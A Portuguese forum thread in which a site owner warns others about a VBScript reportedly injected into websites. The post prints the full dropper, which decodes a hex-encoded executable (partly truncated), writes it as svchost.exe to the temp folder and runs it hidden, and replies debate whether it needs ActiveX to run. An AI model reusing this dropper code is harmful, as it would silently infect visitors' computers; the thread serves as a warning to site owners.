← Segurança

Script vb que instala virus no pc dos visitantes

Lida 2329 vezes

Offline

kurtmix 
Membro
Mensagens 1895 Gostos 604
Feedback +4

Troféus totais: 28
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Eighth year Anniversary Seventh year Anniversary Search Level 5 Windows User Super Combination Combination Topic Starter

Recebi um email de um colega que trabalha em segurança web, alertando para um script que anda a circular em muitos sites e que instala um virus no pc dos visitantes. Avisaram-me para ver em todos os meus sites se não tinha nos ficheiros html o seguinte código:

Código: [Seleccione]
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F453ECC2B0328291B0328291B03282910D7D1491B4328291B94A1791A7328291B94A1191A7328291B0328391E5338291B94A019126328291B94A0691EE328291B94A1691B1328291B94A1391B13282916FB88026B03282910000000000000000504500004C010500D327A5470000000000000000E0000F010B0108000004000000A2010000000000C83400000010000000E000000000400000100000000200000500010000000000040000000000000000F0010000040000AB07010002000000000030000030000000003000003000000000000010000000000000000000000028AC00002102000000C001001C29000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000840600000000000000000000000000000000000000000000000000002E65646174610000E0030000001000000004000000040000000000000000000000000000400000C82E636F6465000000EAB100000020000000B2000000080000000000000000000000000000200000EC2E7465787462737348C1000000E000000004000000BA0000000000000000000000000000400000C04441544100000000E203000000B001000004000000BE0000000000000000000000000000400000C02E727372630000000030000000C00100002A000000C20000000000000000000000000000400000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000EBA01B7D12DC187DC2F7187DB8691A7D5234197D0D35197DD126197DB9A01B7D7F11197DF8ED187D323C1B7D38DB187DEEE6187D911F197DA5C5187D04DB187DCA28187D81B5187D00000000BB53547D0118B977811BB9779D16B9777816B977CF33B977D21BB97700000000F1F6BA77760BBC7741AFBC777AFFBA774EF8BA7720D0BB77216EBC77BCBBBD77400CBE777382BC773EFBBD771DF7BA775C82BC77000000003474817D4385817D6B6F817D7D59837D3B89827D137C817D5F18837DDBD0817D9F5C817D85B2817D7AA4817D6F91817D078E817D6D65847D5959827DB4DD837DD0DC837D55BE817D0C79817D6771817D81BB827D6BEF837D7982817D5565817D9785817D6072817DCAEC827DD493827DAE76817D0165817D556C817D1391817D7D5D817DD256817DE3B1817D044B817D68BD817D739D817DE471817D976F817DC3BD817D2163847D384C817D726A817D50C6837D1EA0817D6B4E817D8295817DFC06837D1D5E817DD579817D994E817DBD49817DF45F817DE8AE817D10C9817D724A817D1D8D817D(...)00000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

Este script substitui o ficheiro svchost.exe do computador do visitante por um svchost.exe com virus.
Este ficheiro está sempre activo nos computadores e pode causar muitos estragos.
Vejam também nos vossos sites se não tem nada, informaram-me que muitos sites estão a ser invadidos por hackers que inserem este script nos ficheiros dos sites e se não o detectamos vai infectar os nossos visitantes.
Já verifiquei todos os meus sites e não tenho nada mas é de ficar preocupado saber que anda gente a fazer isso.
Se os colegas do +t souberem da origem desta ameaça era bom que informassem aqui.
Offline

Bruno Mota 
Membro
Mensagens 1733 Gostos 3
Troféus totais: 28
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

isso não irá funcionar assim...
Offline

kurtmix 
Membro
Mensagens 1895 Gostos 604
Feedback +4

Troféus totais: 28
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Eighth year Anniversary Seventh year Anniversary Search Level 5 Windows User Super Combination Combination Topic Starter

isso não irá funcionar assim...

Não vai funcionar assim? Que queres dizer?
Offline

Bruno Mota 
Membro
Mensagens 1733 Gostos 3
Troféus totais: 28
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

primeiro tens de ter um ficheiro compilado com o código em questão para poder fazer alguma coisa, caso esteja em uma página html apenas será exibido o texto não executado, quanto muito dentro de um ActiveX e tinhas de aceder pelo internet explorer e permitir o controlo activex
Offline

kurtmix 
Membro
Mensagens 1895 Gostos 604
Feedback +4

Troféus totais: 28
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Eighth year Anniversary Seventh year Anniversary Search Level 5 Windows User Super Combination Combination Topic Starter

Exacto, aparece popup com activex e os visitantes que confiam na página aceitam o active-x. Mas não sei como há páginas que instalam logo, segundo me disseram existem páginas que apenas com serem abertas aparece uma tela como se fosse scanner de virus e se carregamos em fechar estamos tramados. A única forma de sair é com cntrl+alt+del. Não percebo muito destas coisas mas tenho lido muito em fórums de segurança e pelo que vi nem sempre é necessário o usuário aceitar um activex para o virus se instalar. Não sei se tem algum ficheiro que se instala na pasta temp do nosso pc e depois activa o virus ou algo assim...